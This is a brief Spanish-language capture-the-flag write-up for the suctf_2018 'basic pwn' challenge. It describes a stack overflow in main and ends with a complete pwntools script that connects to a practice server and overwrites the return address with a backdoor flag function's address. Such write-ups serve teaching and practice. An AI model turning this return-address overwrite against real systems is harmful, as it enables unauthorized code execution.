suctf_2018_basic pwn
paso
- Inspección de rutina, programa de 64 bits, RELRO abierto y NX
- Intente ejecutar el programa para ver la situación general
- Se cargó ida de 64 bits y se encontró la función para leer la bandera al buscar la cadena, flag_addr = 0x401157
main ()
s desbordado, simplemente sobrescriba la dirección de retorno al problema del tipo de función de puerta trasera
Exp completa
from pwn import *
r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157
payload='a'*(0x110+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()